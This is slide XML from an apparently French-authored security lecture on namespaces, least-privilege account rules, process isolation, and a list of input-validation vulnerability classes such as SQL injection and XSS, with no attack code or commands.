            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>namespace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>:  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root Filesystem "/" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> accessible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589E7-4C74-1B6F-E5E1-65209025E0EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2801893" y="2670746"/>
            <a:ext cx="2261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Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0"/>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>Virtualization</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="24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958DFF2-2C95-8C5D-6B4B-33FA33DF1B1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20742164">
            <a:off x="5330582" y="3056340"/>
            <a:ext cx="54982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D26A9EF-C407-2F29-518E-BFA9F5863142}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="21401959">
            <a:off x="5330581" y="3755610"/>
            <a:ext cx="54982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5CBCA6B-7558-0A4A-7B5B-E0FB7D6DD5AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1169941">
            <a:off x="5324394" y="4464753"/>
            <a:ext cx="54982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87EE18-2A19-DC08-245B-4D9303246DC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6273010" y="4505622"/>
            <a:ext cx="5037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Network </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>namespace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>:  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network </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>addresses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> are accessible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F28E49F-00E5-6D1F-26E3-585F844C7214}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="3057405">
            <a:off x="5339775" y="5314558"/>
            <a:ext cx="54982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F79DB3-138D-5CE7-9357-B0F0EF508D14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6283928" y="5576103"/>
            <a:ext cx="4328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Process, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>Users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0"/>
              <a:t>, ...  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>namespaces</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>:  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... are accessible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5228D0-AE05-0A78-DD8D-0BFBC114A793}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5063666" y="3553122"/>
            <a:ext cx="6866397" cy="304770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7425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CCABD-51AF-0747-EDD0-A11970DB8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0" y="1640681"/>
            <a:ext cx="10515600" cy="3576637"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Rule #1  .. do not use  "root"  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>account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/>
              <a:t>use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>minimalist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> service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priviledge</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>use "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>exceptionnaly</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>trace all "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>" usages</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21482883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EFC2-FC59-19C0-7AF2-56756C1B2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AFB1D-8477-EBA3-E39C-F97A5772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" y="1927225"/>
            <a:ext cx="11201400" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Rule #2  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separated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>accounts</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>                   for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>each</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> app usage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B1777C-3998-AC87-B066-802481FD0BD4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="204786" y="3951288"/>
            <a:ext cx="1120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Rule #3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4400" dirty="0" err="1"/>
              <a:t>give</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4400" dirty="0" err="1"/>
              <a:t>minimalist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4400" dirty="0" err="1"/>
              <a:t>priviledges</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="4400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="4400" dirty="0"/>
              <a:t>          to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4400" dirty="0" err="1"/>
              <a:t>each</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4400" dirty="0" err="1"/>
              <a:t>account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48735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43ECF-5849-D077-BE8E-A2353342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1400" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="4400" dirty="0"/>
              <a:t>Example Rule #1, #2, #3  in  Android System : I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4400" b="1" dirty="0"/>
              <a:t>nstall new App =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4400" b="1" dirty="0" err="1"/>
              <a:t>Add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4400" b="1" dirty="0"/>
              <a:t> new User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37EB4-49C3-093E-A78B-BB40CDDE1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72" y="4012280"/>
            <a:ext cx="4058549" cy="1362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E2395C-C2ED-7757-C6FC-378CFA8F4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435" y="2366963"/>
            <a:ext cx="6352767" cy="4447386"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27650" name="Picture 2" descr="Download the Illinois Lottery App for Android™ | Illinois Lottery">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD747107-5925-EECE-BA08-DF14E378D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70" y="2624138"/>
            <a:ext cx="366712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101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067F-9AAD-1BA3-5127-27E7D3215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6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Examples</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>: Input Validation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Errors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B79877-D789-B877-AAE4-8941C78D86AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4243389" y="1714501"/>
            <a:ext cx="4513864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SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>Cross-Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>Directory Path </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>Traversal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Command Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>XML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>External</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>Entity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> (XXE) Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>Insecure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>Deserialization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20528543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6A5D1-7C7C-2D29-2C3C-A2CFBAA47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2"/>
            <a:ext cx="10515600" cy="1920875"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Minimise Risk </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:b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Horyzontal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Priviledge</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Escalations</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:b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Pivoting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410DC3D-44A7-0E4C-07A2-A4AE526421C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="18967418">
            <a:off x="3483776" y="5968014"/>
            <a:ext cx="1123950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674" name="Picture 2" descr="Search App Icon #423451 - Free Icons Library">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14FAECDD-999E-1901-80D7-C17E85B63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664" y="5072063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B040D5-A807-B983-3C10-8330A57FBDE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1">
            <a:off x="4527598" y="4524375"/>
            <a:ext cx="485777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676" name="Picture 4" descr="Icon Login #201052 - Free Icons Library">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A894269-F323-4AF6-1208-3D9418ADE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697" y="3490913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822718-18C7-46A2-441F-36131FE6BAEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="934328" y="6110889"/>
            <a:ext cx="264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compromized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0"/>
              <a:t> App  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 4" descr="Icon Login #201052 - Free Icons Library">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8799A6A8-7F59-8BA3-643A-A61E02521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599" y="3490912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arch App Icon #423451 - Free Icons Library">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80E00479-18CF-C067-22CB-340E3E9D0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41" y="5005387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con Login #201052 - Free Icons Library">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBA9F12E-E6D3-5E44-2763-BA97F7459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949" y="3490912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arch App Icon #423451 - Free Icons Library">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CFD384D-9BEF-9CD7-07BC-47A8B5051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391" y="5005387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con Login #201052 - Free Icons Library">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03809848-29D0-107E-FBD4-BB1049C55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599" y="3490912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arch App Icon #423451 - Free Icons Library">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2637079B-F0B3-75C8-DC18-601278342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041" y="5005387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1347B2D0-878A-74BE-5E32-62FB557816C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6170390" y="3719511"/>
            <a:ext cx="895352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54BC72F-9301-14CD-2E71-FE20F0B37C40}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2797423">
            <a:off x="6098222" y="4626163"/>
            <a:ext cx="1123950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C9A543-6BDA-FE84-2F2F-ACB59BE981FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5624517" y="2224088"/>
            <a:ext cx="0" cy="3886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A4AF9A-2264-2AFE-8A83-732C883B72B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3863238" y="2271713"/>
            <a:ext cx="13442" cy="38391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826B36-3D59-AD78-8187-ADFCB9A6A19F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9082090" y="2238375"/>
            <a:ext cx="0" cy="39058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EC33A6-32B5-C922-C626-E26196A9FA7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10620376" y="2262188"/>
            <a:ext cx="0" cy="38820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34C4EF5-A009-0C25-D689-57FEA7C6EAA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12020554" y="2224088"/>
            <a:ext cx="0" cy="39201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106DDE-1B7E-FD4E-0966-AB5CF8A5A1FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7510467" y="2266950"/>
            <a:ext cx="0" cy="387727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D043BA3-133F-6BE2-F873-C9E0E28175C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1125066" y="4329686"/>
            <a:ext cx="26762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 =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>compromized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0"/>
              <a:t>        User </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>account</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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ADFC12-8CE7-4BB7-2479-8C237E7A7944}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1125066" y="2459505"/>
            <a:ext cx="26169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 =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>compromized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0"/>
              <a:t>        user Files data</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="24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1887CBF-D49D-3D85-344E-C1F810BD8512}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="18882557">
            <a:off x="6042025" y="2785753"/>
            <a:ext cx="1123950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75B7279-6256-B883-BEA2-7621EEC06DFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1">
            <a:off x="4515997" y="2943225"/>
            <a:ext cx="485777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678" name="Picture 6" descr="File Icon Image #40500 - Free Icons Library">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4B5BD79-C73C-93F3-58A5-6FAA59566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690" y="1929443"/>
            <a:ext cx="738532" cy="73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7" name="Picture 6" descr="File Icon Image #40500 - Free Icons Library">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAECD085-B914-5DAE-F9CD-8854577ED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096" y="1971425"/>
            <a:ext cx="738532" cy="73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9" name="Picture 6" descr="File Icon Image #40500 - Free Icons Library">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60EE271C-99DA-1242-7AEF-3B82448AD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57" y="2009430"/>
            <a:ext cx="738532" cy="73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6" descr="File Icon Image #40500 - Free Icons Library">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A8E5C28-FF01-7D5C-1464-BBBCA6AF0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034" y="1990427"/>
            <a:ext cx="738532" cy="73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81" name="Arrow: Right 28680">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{915120DB-47B5-2E67-F137-78AB004FC82A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6176963" y="5314950"/>
            <a:ext cx="895352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&quot;Not Allowed&quot; Symbol 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECE95A91-BE1D-9936-0817-15DCFF38D302}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6238875" y="2795589"/>
            <a:ext cx="533819" cy="484226"/>
          </a:xfrm>
          <a:prstGeom prst="noSmoking">
            <a:avLst>
              <a:gd name="adj" fmla="val 1212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683" name="&quot;Not Allowed&quot; Symbol 28682">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1778519-7BB8-A053-DFC3-2B2AD40E8D4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6271792" y="3603370"/>
            <a:ext cx="533819" cy="484226"/>
          </a:xfrm>
          <a:prstGeom prst="noSmoking">
            <a:avLst>
              <a:gd name="adj" fmla="val 1212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1669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1F80-1296-21FA-9D5D-474B555F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Kernel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D83CD-A85E-049F-CC87-0C3CCBBC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112" y="1690688"/>
            <a:ext cx="9240051" cy="49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154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5C143-841F-F2CA-20FA-EDFD6C06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88"/>
            <a:ext cx="10515600" cy="1162052"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Process Isolations Principles</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>1 Process = 1 Exe Program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2CD10C-114C-C739-3DC0-7BF91B8526F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2409825" y="4983956"/>
            <a:ext cx="7272338" cy="523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4DC59E-7611-8407-AB3A-53697A1506A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2409825" y="5107781"/>
            <a:ext cx="7272338" cy="523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5511D0F-D813-708E-C899-2D452366B0B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2224088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31E934-8D12-1BA2-89AF-A8A12FCC2FFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5038725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B2A86E-C7DD-D48F-76B0-6D12780308CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8070057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16C60-418B-0169-C5FE-4281BC015E68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2224088" y="2560677"/>
            <a:ext cx="10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515A2-DEFE-4675-B602-05C6BE64E04C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4986959" y="2550079"/>
            <a:ext cx="10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50EC9-4000-F760-09B3-5F290C6004DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8018291" y="2560677"/>
            <a:ext cx="10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399701-9D64-F8AB-C491-032CA292F532}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4570188" y="2255044"/>
            <a:ext cx="14909" cy="214312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F3EE0D-468F-003F-A329-3038F1A4E0D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
